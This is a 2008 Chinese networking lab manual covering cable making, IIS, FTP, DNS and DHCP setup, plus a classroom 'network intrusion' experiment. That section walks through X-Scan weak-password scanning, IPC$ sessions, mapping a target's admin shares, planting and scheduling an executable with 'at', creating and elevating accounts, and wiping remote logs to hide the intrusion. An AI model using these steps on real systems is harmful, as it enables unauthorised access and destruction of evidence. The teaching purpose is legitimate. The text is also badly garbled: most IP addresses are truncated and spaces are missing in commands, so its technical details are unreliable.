计算机网络基础实训手册.doc

计算机网络基础实训手册主编 XX 计算机工程学院2008-6-12 20目 录实验一 双绞线的制作与网络互联1实验二 建立信息发布平台IIS6实验三 配置DNS13实验四 配置DHCP16实验五 网络入侵实验21实验六 配置Outlook27实验一 双绞线的制作与网络互联实验目的：学会制作双绞线，HUB、交换机网联设备，实现对等主机和局域网的互联。一、双绞线的制作1.交叉线用于将同种设备连接在一起：如计算机至计算机，交换机至交换机，路由器至路由器等。交叉线两端分别用T568A、T568B标准，（即一端是A标准，一端是B标准）；2.平行线（也叫直通线，直连线）用于将异种设备连接在一起，如计算机至集线器，计算机至交换机，路由器至集线器，路由器至交换机等等。平行线两端都使用相同的接线标准（T568A或者T568B），通常情况下，业界普遍使用T568B标准作为平行线的接线标准； T568A、T568B标准参见下图1：序列号标准T568A白绿绿白橙蓝白蓝橙白棕棕T568B白橙橙白绿蓝白蓝绿白棕棕 图1 T568A/T568B标准 3.平行线制作步骤 将双绞线放入线钳上的“剥线刀口”见图2，轻轻按压线钳并旋转双绞线，将其外皮层剥除2厘米左右，见图3；注：有些线钳可能无剥线刀口，可用剪切刀口小心剥除外皮层； 图2 剥线刀口 图3 剥除外皮层 将四对缠绕的双绞线两端都按T568B标准顺序排列，并理直排拢，如图4； 图4 按T568B 标准排列 用线钳 “剪切刀口”将线头剪齐，留下1.4厘米左右长度，见图5和图6：图5 剪切线头图6 剩余1.4厘米长度 将水晶头引脚线面向自己，将8根线双绞线插入水晶头接口内，见图7；双绞线应尽量往里插，直到水晶头尽头能看到清晰的8个接触点为止，参见图8，完成后仔细检查各线排列顺序是否正确；图7 插入水晶头 图8 八个接触点 将水晶头放入线钳“压口”内，此时要注意将双绞线的外皮层一并放入水晶头内一起压制，以增强其抗拉性能，并用力将线钳压紧，参见图9；图9 压制双绞线 正确压制，不易脱落 错误压制，容易脱落4双绞线检测步骤将已做好头的双绞线两端分别插入检测仪主、次检测仪接口内，打开检测仪开关；观测主、次仪器上指示灯。对于“直连”双绞线，如果这8个指示灯按编号一一对应闪亮，则说明此“直连”双绞线能正常工作；对于“交叉”双绞线，主、次仪器上的指示灯对应闪亮关系为：主仪器上的1、2号灯对应于次仪器上的3、6号指示灯，主仪器上的3、6号灯对应于次仪器上的1、2号指示灯，其余为“平行”的对应关系（一句话归纳为1对3，2对6，其余照旧）。二、对等主机的组建对等主机概念：将两台主机用交叉线相连，两台主机称为对等主机。 熟悉实验环境 启动windows2000，配置IP： 主机1：0，子网掩码为； 主机4：0，子网掩码为； 在主机1和主机4“运行”窗口中输入“command”命令，进入Dos后，输入“ipconfig/all”命令，查看本机的网卡信息，如IP地址、子网掩码等信息，参见下图； 将主机1与主机4的插线板接口用交叉线连接，使用ping命令测试通情况。格式：ping被测IP举例：在主机1输入“ping 0”回车之后，可以根据应答信息判定与主机4的连通情况，左下图表示能够连通，右下图表示网络超时，不能连通；注：图中1ms表示数据延迟，TTL表示生存周期。数据包每经过一个路由节点，生存周期减1，当生存周期减至0时数据包被丢弃，以免其无休止扩散堵塞带宽。因此生存周期越少表示数据包所经过的中间节点数越（ ）。 A.多 B.越少 若将IP设置为如下： 主机1：0，子网掩码为 主机4：0，子网掩码为测试网络连通情况，此时发现两主机（ ）A能连通 B. 不能连通原因是： 。 将IP配置回： 主机1：0，子网掩码为 主机4：192.168.1. 40，子网掩码为 在主机1桌面上新建文件夹“学生论文”，点击文件夹，右键打开“属性”窗口，单击“共享”选项，选中“在网络上共享这个文件夹”，见图10； 在主机4上双击“网上邻居”，打开“网上邻居”窗口，可以看到主机1刚刚所设定的共享文件夹“学生论文”，如图11：图10 设置共享文件夹 图11 查看共享文件夹三、局域网的组建将IP配置为： 主机1：0，子网掩码为 主机4：0，子网掩码为 用交换机（24个端口中的任意两个端口）和两条直连线将连接主机1与主机4对应的插线板网络端口相连，用ping命令测试两主机的连通情况； 在主机1桌面上新建文件夹“学生论文”并设置共享，在主机4的网络邻居查看此共享文件夹。 若将IP配置为： 主机1：0，子网掩码为 主机4：0，子网掩码为此时用ping命令查看局域网中两机连通情况请，根据实际情况打勾：能连通（ ）不能连通（ ）原因是： 实验二 建立信息发布平台IIS（一）实验目的学会在Windows 2000系统上安装和配置信息发布平台IIS（二）实验内容1 安装IIS2 配置IIS，包括Web服务器和FTP服务器（三）实验环境配置主机名称担任角色操作系统IP地址子网掩码主机1服务器Windows2003 Sever0主机2客户机Windows20000主机4客户机Windows20000注：三台主机用交换机连接，用ping命令测试网络连通性，不通重接；（四）实验步骤一、安装IIS 1.启动主机1进入Windows 2003；若操作系统中还未安装IIS服务器，打开“控制面板”，单击“添加/删除程序”，选择 “添加/删除Windows组件”；2选择组件“应用程序服务器”，点击右下角“详细信息”，见图1，选中“Internet信息服务（IIS）” 见右图2，单击“确定”按向导指示完成IIS安装；图1 应用程序服务器图2 Internet信息服务IIS二、启动IIS1点击“开始所有程序管理工具Internet信息服务管理器”，进入IIS管理器配置界面，见下图；三、配置Web服务1将“Orange”文件夹复制到C盘；鼠标点击“网站”，右击鼠标右键，选择“新建站点”，见图3，进入“网站创建向导图”，点击“下一步”，见图4；图3 新建网站 图42输入网站描述名，可随意输入。如“Orange”网站，点击“下一步”见图5；输入服务器主机1的IP地址“0”和端口号，默认为80，见图6；图5 自行输入网站名 图6 输入IP地址和端口号3. 输入“Orange”网站路径“C:Orangesourceweb”，见图7；点击“下一步”，选择网站访问权限，选中“读取”和“运行脚本”两项，参见图8；点击“下一步”完成向导；图7 输入网站路径 图8 选取权限4. 此时在“网站”里多出刚刚挂上去的“Orange网站”，见图9；选中“Orange网站”点击鼠标右键，选择“属性”，进行更详细的配置，见图10；图9图10 选择Orange属性5. 在“文档”选项卡中点击“添加按钮”，输入Orange网站的主页文件名“index.asp”,见图11；点击“上移”按钮，将“index.asp”上移到顶部，见图12；注:网页的主页文件名一般为index（索引）或者Default（默认），其扩展名有asp、jsp、htm、html、php等。然而IIS默认的主页名只有default.htm、index.htm和default.asp三项，此时管理员可根据网站主页的实际名称添加至其中，还可更改主页文档的搜索顺序。图11 输入主页文档名 图12 更改搜索顺序6现拟禁止主机2访问该站点。点击“目录安全性”选项，在“IP地址及域名限制”，中点击“编辑按钮”，见图13；在“授权访问”的“例外”中单击“添加”按钮，输入主机2的IP“0”，见图14；注：如果只是限制几个IP地址访问该网站，可选中“授权访问”，然后在“例外”中添加所要限制的IP地址；如果只允许几个IP地址访问该网站，可选中“拒绝访问”，在“例外”中添加所允许访问该网站的IP地址。 图13 目录安全性 图14 限制IP7点击“Web”服务扩展，选中Active Server Pages，点击左边的“允许按钮”，客户机才能访问ASP类型的网站；见图15；图15 允许Active Server Pages 8若网站所存放的C盘是NTFS格式分区，还应设置NTFS格式磁盘访问权限。选中“Orange网站”点击鼠标右键，选择“权限”，设置本地磁盘访问权限，参见图16；在“安全”选项里点击“添加”按钮输入用户名“everyone”，见图17，即远程所有用户都可以访问本地NTFS格式磁盘的“Orange”文件夹； 注：在NTFS格式磁盘中，系统默认“everyone”用户对所有目录、文件拥有完全权限；然而在FAT或者FAT32格式磁盘中，系统默许所有用户都拥有完全访问权限；因此，若网站“Orange”文件夹所存放的磁盘是FAT或者FAT32格式，则可跳过此步骤；图17 输入用户名图16权限设置9在主机1中启动IE浏览器，在地址栏中输入0，可浏览刚刚本机设置的网站；10在主机2和主机4中启动IE浏览器，在地址栏中输入0，发现主机2 能 / 不能 浏览该网站，主机4 能 / 不能 浏览该网站，原因是 。四、配置FTP服务器1在C盘新建文件夹命名为“音乐下载”（可自由在文件夹下复制音乐等文件以供下载）作为ftp的主目录；2选中“FTP站点”，点击鼠标右键弹出菜单，选择“新建”“FTP站点”，见图18，进入FTP站点设置向导；按向导提示输入“站点描述”（可自行输入，如音乐站点）、“IP地址”、“主目录路径”和“访问权限”；注：访问权限若选中“写入”，其他客户除可下载FTP资源外，还可对其上传资源；图18图20 限制连接数 图19 3. 此时在“FTP网站”里多出刚设置的“音乐站点”，见图19；选中“音乐站点”，点击鼠标右键，选择“属性”，进行更详细的配置；在“FTP站点”选项卡中，可限制本FTP站点最大连接数，如此例限制最多有10个客户可同时登录，参见图20； 4. 点击“消息”选项卡，可自由填入FTP网站的标题名、欢迎辞、推出提示和超过最大连接数的提示语，参见图21，当然亦可不添；图21 填写提示消息5启动主机4的 IE浏览器，在地址栏中输入0 ，查看主机1所建立的FTP站点，尝试对其下载、上传操作； 注：用浏览器查看FTP站点不可见图21所设置的提示语，但用FTP下载工具（如Flash XP、Cute FTP）连接时提示语可见；6. 对FTP网站设置用户名和密码。FTP网站用户名和密码是和Windows 2003系统的用户名和密码是一致的。 在“控制面板”“管理工具”“计算机管理”中，点击“本地用户和组”，双击“用户”，在右边用户名称中右击鼠标右键，选择“新用户”，见图22；根据提示输入用户名和密码，如用户名为“gdcp”，密码为“123”；图22 设置系统用户名和密码 选中“音乐站点”，点击鼠标右键，选择“属性”，见图19；在“安全帐户”选项卡中剔除“允许匿名连接”，参见图22；图22 剔除“允许匿名连接”7. 启动主机4 的IE浏览器，在地址栏中输入0，出现“登录对话框”，此时必须输入用户名和密码才能登录到FTP站点；实验三 配置DNS（一）DNS理论学习1什么是DNS 英文全称：（Domin Name System），域名系统； 功能：用于IP地址和网站域名的翻译； 提出背景：浏览对方主机网站时，必须知道对方的IP地址，如sohu网易服务器地址为3，要浏览其网站，必须输入“http：/3；由于IP纯数字化地址难以记忆，兼之当服务器IP更改时，客户端也要做相应更改，对客户造成不便，因此提出对IP地址起英文名以便记忆，即域名；此时可输入“”，其中www是主机名，表示是提供网页服务的Web服务器，是域名,com表示该域名属于公司企业；2DNS工作方式 学生输入地址，浏览器向学校DNS服务器发出查询请求，要求将域名解析为IP地址； 学校DNS服务器查到对应的IP地址则返回给学生浏览器，查不到则向上一级电信DNS服务器查询（一级级向上查询），最终将结果“3”返回学生的浏览器； 学生浏览器地址自动更改为“www.3”，通过学校路由器连接到网易服务器。（二）实验目的掌握DNS工作原理，学会配置DNS服务器。（三）实验内容1. 安装DNS服务器管理软件2. 学会配置DNS服务器（四）实验环境配置主机名称担任角色操作系统IP地址子网掩码DNS主机1DNS服务器Windows2003 Sever无主机2Web服务器Windows2000主机4客户机Windows2000【效果】在客户机4浏览Web服务器2网站，原本要输入“http:/ ”；现Web服务器2向DNS服务器1申请域名“”，客户机4浏览Web服务器2网站只需输入“”；（五）实验步骤1.三台主机用交换机连接，用ping命令测试网络连通情况，不通重接；2.配置服务器2 IIS，启用ORANGE网站；3.启动服务器1 DNS程序 启动DNS服务程序操作：在开始菜单所有程序管理工具DNS； 连接DNS服务器，选择“这台计算机”，见图1；由于多班共做实验，因此实验前必须删除当前DNS配置，在主机名“30141”（实际中根据不同主机，名字会有不同）上单击鼠标右键选择“删除”，删除当前DNS配置；图1 连接DNS服务器4.配置DNS 新建区域操作：在DNS管理器中，在主机名“30141”上单击右键，选“新建区域”，见图2，进入“新建区域向导”；在向导设置选中“标准主要区域”，参见图3，在“正向或反向搜索区域中”应选“正向搜索区域”；点击“下一步”继续； 图2 新建区域 图3 输入区域名，输入“”作为区域标识，见4图，点击下一步；在“创建新文件”中，系统自动追加文件名为“.dns”的文件，也可命名为其他，见图5，点击下一步，选择是否允许动态更新，可自行选择，最后点击“完成”新建一个名为“”的区域； 图4 输入区域名 图5 创建文件名 设置新建区域的属性。新建完“”区域后，在左边“30141”的“正向搜索区域”里即可以看到“”区域；点击“”区域，单击鼠标右键，选择“新建主机”，见图6；然后在“名称”话框中分别输入主机名“www”，表示此域名属于www Web服务的域名（常用主机名有www、ftp、mail）；IP地址中填“”（Web 服务器2的IP），然后单击“添加主机”按钮，见图7，创建主机地址记录； 图6 新建主机 图7 添加主机五、实验测试 在客户机4 ping Web服务器2“ping ”， 能 / 不能 ping得通？ 在客户机4 ping Web服务器2 “ping ”， 能 / 不能 ping得通？ 在客户机4打开浏览器，输入地址“”， 能 / 不能 浏览服务器2网站？ 在客户机4打开浏览器，输入地址“”， 能 / 不能 浏览服务器2网站？实验四 配置DHCP （一）DHCP理论学习1什么是DHCP 英文全称：（Dynamic Host Configuration Protocol），动态主机配置协议； 定义：DHCP是动态分配管理IP地址的TCP/IP协议。 提出背景：早期在没有DHCP服务的网络中，需要网络管理员记录哪些IP地址已被分配，哪些地址可供使用，客户必须以手动分配方式对客户机IP进行配置，此时IP地址是静态分配的，会造成管理员工作量大，IP地址浪费的问题。 功能：当客户机设置为自动获取IP地址时，向DHCP服务器发出请求为其分配IP地址、子网掩码、网关和DNS服务器参数，以实现IP地址的动态分配。 作用：使用DHCP服务器，可以极大降低网络中配置客户端网络设置的管理成本，并且可以避免手动分配静态IP地址时产生的IP地址冲突问题 。2DHCP工作方式 客户机若设置为自动获取IP地址时，将使用（特殊IP地址，我是谁）作为源IP地址，以广播地址55（特殊IP地址，本网络广播地址，）作为目的地址，广播到本网络中请求DHCP服务器为其分配IP地址； 当网络中任何一个DHCP服务器(同一网络中可能存在多个DHCP服务器)在收到客户端的请求信息后，则从IP地址池中选取一个没有出租的IP地址连同子网掩码、网关、DNS地址等信息，你广播方式发送给客户机； 客户机收到DHCP广播后，同样以广播方式向网络中发送DHCP响应信息，既通知它已选择的DHCP服务器，也通知其他DHCP服务器，以便回收没有租用的IP地址。注：若网络中没有DHCP服务器，客户机将从IP地址段(54)自动选择一个地址，并将子网掩码设置为；此后，客户机会继续每隔5分钟广播一次请求信息，直到得到服务器DHCP的IP分配信息为止。（二）实验目的掌握DHCP工作原理，学会配置DHCP服务器。（三）实验内容3 安装DHCP协议4 配置DHCP可供分配的IP地址范围：0 54其中保留IP地址段为：0 89排除IP地址段为： 注：保留IP地址段是为特定目的而保留的IP，如分配给特权用户；排除IP地址段用于网络设备和服务器的静态IP；（四）实验环境配置服务器1 IP：（DHCP服务器），操作系统:Windows 2003 Sever；客户机3 IP：自动获取（特权客户机），操作系统：Windows 2000；客户机4 IP：自动获取（普通客户机），操作系统：Windows 2000；注：DHCP服务器必须配置为静态IP地址（五）实验步骤1.启动主机，设置实验环境主机名称担任角色操作系统IP地址子网掩码主机1HDCP服务器Windows2003 Sever主机3特权客户机Windows2000主机4一般客户机Windows2000注意：三台主机用交换机连接，用ping命令测试网络连通情况，不通重接。2.更改客户机IP自动获取方式将客户机3设置为“自动获取IP地址”，此时自动获取的IP地址为 ，子网掩码为 ，原因是此时本局域网中没有安装DHCP服务器，客户机4不能自动获取IP地址和子网掩码。将客户机4设置为“自动获取IP地址”，此时自动获取的IP地址为 ，子网掩码为 ，原因是 。3.删除DHCP以前配置 启动DHCP服务程序操作：在开始菜单程序管理工具 DHCP； 删除DHCP配置由于多班共做实验，因此实验前必须删除先前DHCP配置；操作：选中“作用域”单击鼠标右键，在菜单中选择“删除”，见图1； 图1 删除先前配置4.配置DHCP服务器 设置DHCP作用域 DHCP作用域是指可供分配的IP地址的集合，DHCP服务器只能使用作用域中的IP地址来分配给客户机。操作：选中DHCP服务器名，点击鼠标右键选择“新建作用域”，见图2；在“欢迎使用新建作用域向导”页，点击“下一步”；输入作用域的名称和描述（此两项仅供提示用，可随意填写），见图3，然后点击“下一步”；图2 设置作用域 图3 输入可供DHCP分配的IP范围和其默认子网掩码，如图4所示，再点击“下一步”； IP范围： 54 子网掩码：图4 设置IP范围和其子网掩码 在“添加排除”页，输入上述IP分配范围中需要排除的IP范围，这些被排除的IP地址范围不会分配给客户机；输入需排除的IP范围：，点击“添加”，见图5；点击“下一步”，填写租约期限，默认为8天，亦可自行设置时间长短，见图6，然后点击“下一步”；图6 填写租约期限图5 输入排除IP范围注：当期限满后，IP地址将由DHCP服务器回收，以供再次分配。 在“配置DHCP选项”页，选择是否需要现在配置DHCP的几个基本参数（如网关地址、DNS服务器地址、WINS服务器地址等），选择“是”，点击“下一步”； 在“路由器（默认网关）”页，输入路由器地址“”点击“添加”（假设路由器IP地址为），见图7，点击“下一步”；注：路由器地址即为默认网关地址。所谓网关是指局域网与外网的关口（接口），即路由器；一般来说，内网与外网的网络号是不同的，路由器是将内外与外网连接在一起的，称为网关；图7 填写默认网关IP 在“域名称和DNS服务器”页，输入DNS服务器的IP地址；现假设DNS服务器IP为，点击“添加”将之填入，“父域名称”和“服务器名”两项不需要填写，见图8；图8 填写DNS服务器IP注：DNS服务器用以将域名转换为IP地址。假设太平洋电脑城网站服务器IP地址为，浏览其网页时应输入http：/；但因IP地址纯数字难以记忆，可对网站申请域名，如http：/，其中pconline称为域名，www表示提供www网站服务的服务器，com表示网站属于公司企业商业网站，cn表示中国china；DNS服务器IP都是公众IP； 在“WINS服务器”页，可输入WINS服务器地址；由于本局域网没有WINS服务器，此步骤可以跳过，直接点击下一步；注：WINS服务器用以将主机名与IP地址的转换。 在“激活作用域”页，点击“是”激活此作用域；作用域激活后，即可为客户机提供动态IP分配服务； 设置IP保留地址 保留地址IP段是为特定DHCP客户所保留的IP地址段，此时保留的IP地址不会分配给其他一般客户。现将其一保留地址为“8”分配给特权主机3；操作：展开作用域，选择“保留”，单击鼠标右键选择“新建保留”，见图9；输入IP地址“8”和特权主机3的MAC物理地址（可用ipconfig /all命令查看），“保留名称”和“描述”可随意填写，见图10；图9 保留地址IP 图10 分配保留地址五、实验测试更新主机4的IP地址（先禁用网卡再启用网卡以获取新IP地址），此时主机4的IP地址为 ，子网掩码为 ，DNS服务器地址为 。更新主机3的IP地址，此时主机3的IP地址为 ，子网掩码为 ，DNS服务器地址为 。实验五 网络入侵实验 （一）实验目的 学会网络入侵的基本步骤和方法，掌握ipc入侵的原理和防御之策。（二）实验内容5 利用Xscan软件扫描系统漏洞6 利用ipc$漏洞入侵系统7 对系统实行基本的安全防范（三）实验环境配置主机名称担任角色IP地址子网掩码操作系统软件主机1黑客0Windows 2000rebot.exe和 Xscan主机4肉机0Windows 2000关闭所有杀毒软件 在局域网中利用主机1入侵主机4 注：两台主机用交换机连接，用ping命令测试两主机的连通性，不通要重接；（四）名词解释及常用命令简介 1ipc$ IPC$(Internet Process Connection)是共享“管道”资源，它是为管理员远程管理计算机共享资源时使用，当验证合法用户名和密码时，远程用户可获得相应的资源共享访问限权。$表示共享。IPC$的漏洞在于：在获得合法管理员帐号和密码时，系统默认共享主机所有资源，方便管理员的远程管理。2Xscan3.3 扫描工具简介 Xscan是一款黑客常用到的扫描工具，采用多线程对指定IP地址段进行安全漏洞检测，扫描内容包括：远程操作系统类型及版本，标准端口状态，漏洞，SQL-SERVER、FTP-SERVER、SMTP-SERVER、NT-SERVER等弱口令用户，并对于一些已知漏洞给出相应的漏洞描述、入侵步骤及安全解决方案。 3入侵命令 net use建立ipc共享空链接格式：net use 对方IPipc$ “” /user:“” 用途：建立IPC空链接，用于测试对方主机是否存在共享漏洞。效果：若提示“命令成功”，表示对方主机存在漏洞，若提示“找不到网径”表示不存在此漏洞；举例：net use 1ipc$ “” /user:“” 解释：查看1主机是否存在共享漏洞 net use建立ipc共享链接 格式：net use 对方IPipc$ 密码 /user:用户名 用途：用扫描软件破解出对方用户名及密码后进行入侵； 举例：net use 1ipc$ 123 /user:Administrator解释: 以用户名为Administrator，密码为123建立与1的共享连接； net use 映射对方磁盘 格式：net use x: 对方IPc$用途：映射对方IP的c盘到到本地x盘，即可在本机看到对方c盘的全部内容。举例：net use x: 1d$解释： $表示共享，d$表示d盘的共享资源；整个命令意思为：在本地建立一个x盘，用以映射IP为1主机的d盘，此时建立的x盘与对方主机的d盘文件是一模一样的； 复制命令copy格式：copy 文件A 对方IPd$文件夹B用途：把文件A复制到目标主机D盘文件名为B的文件夹下举例：copy 1.mp3 1 d$音乐解释：复制1.mp3文件到1主机的d盘的音乐文件夹下；举例：copy 1.exe 1admin$解释：admin$表示系统目录，即系统的安装目录，一般为：C:Winnt或者C:Windows； 格式：net time 对方IP 用途：查看目标主机的系统时间 运行程序at格式：at 对方IP 时间 程序名 用途：在对方IP下某时间运行某程序，例如运行木马盗号程序，自动关机，自动关闭防火墙等；注意：时间是24小时制，电脑不能识辨AM 与PM；举例：at 1 15:00 1.exe解释：在IP为1主机于15：00时运行1.exe程序； 增加系统用户名和密码 格式：net user 用户名密码 /add 举例：net user gdcp 123/ add 解释：在系统上增加用户名为“gdcp”帐号，密码为“123”，但此帐号只有guest管理权限； 提升权限 格式：net localgroup administrators /add用途：将用户名为“gdcp”用户添加到管理员组中使其具有管理员权限； 删除共享 格式：net use 对方IPipc$ /del 用途：为防止被对方主机利用入侵检测工具检测到非法入侵，须对建立的远程共享连接删除； 删除映射盘符格式：net use 盘符 /del举例：net use x: /del用途：删除本机隐射的x盘（五）入侵步骤 启动主机1和主机4进入Windows 2000，分别设置好IP地址和子网掩码；在主机4中创建帐号名为“text”，并自行设置简单密码，如“123456”； 打开X-Scan扫描工具，设置扫描参数。（I）在“指定IP范围处”填写要扫描的主机4 IP“0”，见图1；（II）在“全局设置”“扫描模块”，选择NT-Server弱口令（即操作系统密码），见图2；图1 设置扫描IP图2 设置扫描模块 扫描完成后点击“漏洞信息”，可以看到目标主机4系统的所有帐号名和密码，参见图3；其中扫描到刚创建的“text”帐号，其密码为：“123456”；图3 查看扫描的帐号和密码 入侵。在主机1运行窗口输入“command”或者“cmd”，进入DOS；输入命令：netuse0ipc$123456/user:text 注：表示空格若看到提示“命令成功完成”，则表示成功入侵，否则请重新输入，确保输入无误； 映射对方盘符。输入命令：netuseY:0c$把目的主机4的c盘映射到本主机1的Y盘；此时在主机1打开“我的电脑”可发现系统增加了一个共享Y盘，见图4； 图4 映射对方盘符 复制程序“reboot.exe”文件到对方主机C:Winntsystem32目录下，用于将对方主机重新启动；第一步：将“reboot.exe”文件复制到主机1的C盘上；第二步：输入命令：copyreboot.exe0admin$system32 注：“reboot.exe”程序能让主机重新启动。 admin$表示系统目录，即对方C:Winnt的系统目录。由于黑客不知对方主机系统安装在哪个目录文件下，可用admin$指定系统目录 为使对方主机4在某时运行“reboot.exe”程序，先查看对方的系统时间，输入命令：nettime0根据提示信息，得知对方目前系统时间为下午02：23 添加计划任务，让对方主机4在n分钟后自行运行“reboot.exe”程序重启，输入命令：at014:33reboot.exe 注：输入的运行时间要比查看到的时间稍晚，否则程序将无法执行，此例晚了10分钟； 系统时间为24小时制，切勿输入2:33，这表示凌晨2:33； 涂抹入侵踪迹，要将对方主机系统日志文件全部删除，因为它记录了每次远程连接的IP地址、时间和操作记录；第一步：将“clearlog.exe”文件复制到主机1的C盘上；第二步：输入命令：clearlog0app 清除远程计算机的应用程序日志clearlog0sec 清除远程计算机的安全日志clearlog0sys 清除远程计算机的系统日志 删除此次连接，防止被对方主机入侵检测到；